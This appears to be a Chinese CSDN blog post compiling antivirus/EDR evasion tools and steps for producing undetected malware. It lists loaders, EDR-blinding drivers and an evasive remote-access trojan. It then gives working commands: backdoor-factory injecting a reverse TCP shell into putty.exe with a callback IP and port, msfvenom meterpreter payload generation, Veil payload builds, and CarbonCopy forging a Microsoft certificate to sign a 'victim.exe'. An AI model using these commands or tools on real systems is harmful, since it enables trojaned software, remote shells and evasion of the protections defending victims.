WEB渗透免杀篇-免杀工具全集

已于 2024-08-19 18:26:20 修改
阅读量721 收藏 5
点赞数 12
分类专栏: 渗透测试 文章标签: WEB渗透 渗透测试 网络安全 WEB安全 免杀
于 2024-08-19 18:21:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_59468567/article/details/141331954
版权

 往期文章

 WEB渗透免杀篇-加载器免杀-CSDN博客

 WEB渗透免杀篇-分块免杀-CSDN博客

WEB渗透免杀篇-Powershell免杀-CSDN博客

WEB渗透免杀篇-Python源码免杀-CSDN博客

WEB渗透免杀篇-C#源码免杀-CSDN博客

WEB渗透免杀篇-MSF+shellcode免杀-CSDN博客

WEB渗透免杀篇-Bypass-AMSI-CSDN博客

 工具列表 

工具名称下载地址工具描述
AV_Evasion_ToolGitHub - 1y0n/AV_Evasion_Tool: 掩日 - 免杀执行器生成工具掩日 - 免杀执行器生成工具
ScareCrowGitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.自动化生成 EDR 软件 Bypass Payload 的工具,一键化签名免杀
avetGitHub - govolution/avet: AntiVirus Evasion Tool
AniYaGitHub - piiperxyz/AniYa: 免杀框架免杀框架
shellcodeloaderGitHub - knownsec/shellcodeloader: shellcodeloadershellcode加载器
Themida需要自己去找资源加壳工具
SigThiefGitHub - secretsquirrel/SigThief: Stealing Signatures and Making One Invalid Signature at a Time签名工
ShellQMakerGitHub - SecurityAnalysts01/ShellcodeLoader at 1ff79fb9e1b9ad4934da88d9db82494d81a851c0超实用免杀
RealBlindingEDRGitHub - myzxcg/RealBlindingEDR: Remove AV/EDR Kernel ObRegisterCallbacks、CmRegisterCallback、MiniFilter Callback、PsSetCreateProcessNotifyRoutine Callback、PsSetCreateThreadNotifyRoutine Callback、PsSetLoadImageNotifyRoutine Callback...利用带有签名驱动程序的任意地址读/写实现:完全盲目或终止或永久关闭 AV/EDR。
QianjiGitHub - Pizz33/Qianji: 千机-红队免杀木马自动生成器 Bypass defender、火绒、360等国内主流杀软 随机加密混淆shellcode快速生成免杀马千机-红队免杀木马自动生成器
CreateUser夸克网盘分享免杀360创建windows用户工具
reshacker自行获取主要用于替换图标
upxGitHub - upx/upx: UPX - the Ultimate Packer for eXecutablesUPX - 用于扩展的终极打包器
Webshell-loaderGitHub - INotGreen/Webshell-loader: ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)ASPX内存执行shellcode,绕过Windows Defender(AV/EDR)
GobypassAV-shellcodeGitHub - Pizz33/GobypassAV-shellcode: shellcode免杀加载器,使用go实现,免杀bypass火绒、360、核晶、def等主流杀软免杀shellcode加载器,使用go实现,免杀bypass火绒、360、核晶、def等主流杀软
Gh0st2023https://github.com/SecurityNo1/Gh0st2023重写免杀版Gh0st远控、大灰狼远控免杀,目前可免杀360、火绒、腾讯电脑管家等主流杀软。
bypassAVhttps://github.com/cseroad/bypassAV借助Win-PS2EXE项目编写cna脚本方便快速生成免杀可执行文件
在线免杀平台潮影在线免杀平台在线免杀平台
AV_Evasion_ToolGitHub - 1y0n/AV_Evasion_Tool: 掩日 - 免杀执行器生成工具掩日 - 免杀执行器生成工具 用于快速生成免杀的 EXE 可执行文件
ScareCrowGitHub - optiv/ScareCrow: ScareCrow - Payload creation framework designed around EDR bypass.自动化生成 EDR 软件 Bypass Payload 的工具,一键化签名免杀
BypassAv-webGitHub - M-Kings/BypassAv-web: nim一键免杀梅花K战队写的Nim一键免杀源码 使用nim语言进行shellcode加载
SharpThiefGitHub - INotGreen/SharpThief: 一键提取exe的图标、嵌入图标、资源信息、版本信息、修改时间、数字签名,降低程序熵值一键窃取文件的图标、资源信息、版本信息、修改时间、数字签名,降低程序熵值

Shellter

仅支持32位程序
>apt install shellter
指定一个exe文件

image

选择payload

the-backdoor-factory

GitHub - secretsquirrel/the-backdoor-factory: Patch PE, ELF, Mach-O binaries with shellcode new version in development, available only to sponsors

查看是否支持捆绑

>python backdoor.py -f /root/Desktop/putty.exe -S

查看此文件支持哪些payload

>python backdoor.py -f /root/Desktop/putty.exe -s show

reverse_shell_tcp_inline对应msf set payload windows/meterpreter/reverse_tcp meterpreter_reverse_https_threaded应msf set payload windows/meterpreter/reverse_https iat_reverse_tcp_stager_threaded修复IAT user_supplied_shellcode_threaded自定义payload 参数 -s 指定payload -H 回连地址 -P 回连端口 -J 多代码裂缝注入

>python backdoor.py -f ~/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.108 -P 12138 -J -o payload.exe

后门生成在backdoored目录 或 生成payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.108 LPORT=12138 -e x86/shikata_ga_nai -i 5 -f raw -o shellcode.c

自定义

>python backdoor.py -f /root/putty.exe -s user_supplied_shellcode_threaded -U /root/shellcode.c  -o payload2.exe

Veil

>use 1选择evasion模块
>list查看可用payload
>use 7 选择c格式的payload
>set LHOST/LPORT设置回连IP和端口
>generate生成

image

直接生成的exe可能会被查杀,目前可过360,不能过火绒
使用minGW-w64编译C文件
>gcc -o vel.exe veil.c -l ws2_32

捆绑器

https://github.com/Yihsiwei/GoFileBinder

zirikatu

image

carboncopy

https://github.com/paranoidninja/CarbonCopy
可以创建任何网站的证书并签署
并且生成可执行文件的工具。适用于 Windows 和 Linux
>python3 CarbonCopy.py www.microsoft.com 443 victim.exe signed-victim.exe
Pluto-2003
关注
  • 12
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
红队攻防渗透技术实战流程:红队目标上线之免杀对抗-Webshell&静态查杀&行为拦截&流量监控&代码混淆&内存加载&工具魔改
HACKONE的博客
05-27 307
上面的实验代表了webshell查杀的几个特征:表面代码只能解决代码表面的查杀操作行为哥斯拉执行命令无提示antsword执行命分有提示哥斯拉执行命令无提示但是执行net user 有提示antsword执行命分有提示工具指纹源码魔改(指纹打乱,调用逻辑(行为绕过))对抗:流量产品 和 杀毒产品换冷内工具(自己写的工具)让产品没来得及集成这个工具的检测导致绕过(特征库)
渗透测试web安全 - webshell 免杀 绕过waf总结
网络安全领域优质创作者
02-21 3068
在做渗透测试的过程中经常会遇到waf的阻拦,针对waf绕过webshell总结如下,肯定有遗漏,之后学习之后再继续补充。 小型网站常见的waf有: D盾 一句话免疫,主动后门拦截,SESSION保护,防WEB嗅探,防CC,防篡改,注入防御,防XSS,防提权,上传防御,未知0day防御,异 形脚本防御等等。 防止黑客入侵和提权,让服务器更安全。 云锁 云上的安全边界越来越模糊...
Kali渗透-MSF木马免杀技术
小司机的奥拓
12-25 1989
道高一尺,魔高一丈。杀毒软件的更新是非常快的,这里给出的方法和过程在今天还是可行的。但过了几个月之后,免杀技术就有可能出现重大的变化和更新。免杀技术需要不断地磨练与实践,才能在实战中提高成功率。
渗透测试(一)-Msf生成免杀后门(内网)
阿航的博客
05-25 2887
实验环境: 攻击机:kali linux-2021.1(192.168.56.128) 靶机:Windows10(192.168.1.120) 推荐两个免费在线木马检测网站:VirusScan和VirusTotal 原理图: 1. Meterpreter简介 Meterpreter是Metasploit框架中的一个扩展模块,作为溢出成功以后的攻击载荷使用,攻击载荷在溢出攻击成功以后给我们返回一个控制通道,使用它作为攻击载荷能够获得目标系统的一个Meterpre..
免杀对抗&Go魔改二开&Fscan扫描&FRP代理
qq_45087791的博客
04-09 2200
渗透测试过程中,有后渗透需求时,需要进行反向代理,最早接触的是frp工具,但是在使用过程当中会有配置文件落地,如果忘记删除的情况下容易被溯源C2地址。官方版本的frp在默认配置传输过程中有一些明显的特征,在如今多种安全设备防护的内网会遭受到识别和拦截,如果不进行去除特征或者进行加密传输的话很可能会被设备拦截掉。在落地使用过程中流量及文件不修改的情况下基本被检测查杀,针对这种情况,我们要进行了一些基本的参数测试和特征去除外加功能拓展。=>>直接编译(匹配hash值)=>>功能添加扫描项。
免杀/免杀-小白漏洞笔记
程序员三九的博客
07-21 353
MSF 已经是广为人知的非常流行的渗透平台,没有之一。而作为专注于后渗透的我,最常用的也是 MSF 强大的后渗透功能。
红队系列-shellcode AV bypass Evasion免杀合集
aming小老弟
11-13 1138
壳就是软件所增加的保护,并不会破坏里面的程序结构,当我们运行这个加壳的程序时,系统首先会运行程序里的壳,然后由壳将加密的程序逐步还原到内存中,最后运行程序。加壳虽然对于特征码绕过有非常好的效果,加密壳基本上可以把特征码全部掩盖,但是缺点也非常的明显,因为壳自己也有特征,主流的壳如VMP, Themida等等。客户端上传特征,在云端无法检测到,则上传文件,文件通过杀软系统进行评判,得出总评分,对于无结果的,进行鉴定系统评分,总共得出结果返回给用户,并入云端库。比如可以远程读取png中的shellcode。
远控免杀从入门到实践(2)工具总结
weixin_46236101的博客
03-13 2511
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 《远控免杀从入门到实践》系列文章目录: 1、远控免杀从入门到实践 (1)基础 2、远控免杀从入门到实践 (2)工具总结 3、远控免杀从入门到实践 (3)代码-C/C++ 4、远控免杀从入门到实践 (4)代码-C# 5、远控免杀从入门到实践 (5)代码-Python 6、远控免杀从入门到实践 (6)代码-Powershell 7、远控免杀从入门到实.
免杀实战之面向PHP的WebShell免杀
kali_Ma的博客
10-13 2819
?}}}}?>我们可以通过我们自定义的函数方式,搭配php的版本和可替换函数绕过WAF的拦截,达到免杀的目的!由于在PHP函数中函数名、方法名、类名 不区分大小写,但推荐使用与定义时相同的名字的时候还可以使得大小写进行绕过,所以大大提升了免杀效果!
关于域渗透与免杀对抗思考及其常见方式
03-16
### 关于域渗透与免杀对抗思考及其常见方式 #### 一、域渗透概述 **域**(Domain)是Windows网络中的一个独立运行单位,它不仅代表了一个逻辑组织单元,而且还是Internet上的逻辑组织单元。在Windows网络操作系统...
php shell超强免杀、减少体积工具实现代码
10-27
文档说明该工具仅限于免杀PHP Web Shell使用,因此其应用范围限定在Web安全领域。Web Shell通常用于通过Web界面远程控制服务器,而该工具可以在不改变Web Shell原有功能的前提下,增强其隐蔽性,提高攻击者在Web应用...
AVByPass:一款Web在线自动免杀工具
05-31
一款利用加载器以及Python反序列化绕过AV的在线免杀工具因为打包方式的局限性,不能跨平台,若要生成exe格式的只能在Windows下运行本项目打包速度有点慢,提交后稍等一会开发环境及运行前端使用框架,后端使用框架 ...
ASPmm免杀辅助工具
02-24
ASPmm免杀辅助工具是一种专门针对ASP环境设计的工具,其主要目的是帮助开发者或安全研究人员在测试和调试过程中,能够绕过服务器上的安全防护措施,如安全狗等常见的Web应用防火墙,以便上传并执行特定的ASP代码。...
渗透测试工具-御剑(后台扫描工具
02-21
渗透测试工具-御剑】主要用来信息收集,目录扫描的一款工具。 御剑后台扫描工具是为众多从事网络工作并担任网络安全管理职位的人制作的一款后台安全扫描工具,它能帮你实时监控后台文件的安全性,防御网站风险,为...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8395
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
VB机动车租赁管理系统设计(源代码+系统+开题报告+答辩PPT).zip
08-18
计算机毕业设计资源包含(项目部署视频+源码+LW+开题报告等等),所有项目经过助教老师跑通,有问题可以私信博主解决,可以免费帮部署。
计算机毕业设计jsp篮球NBA周边商城vue论文
最新发布
08-18
计算机毕业设计jsp篮球NBA周边商城vue论文
分享几款开源的后台框架
08-18
X-admin v2.0
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Pluto-2003

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值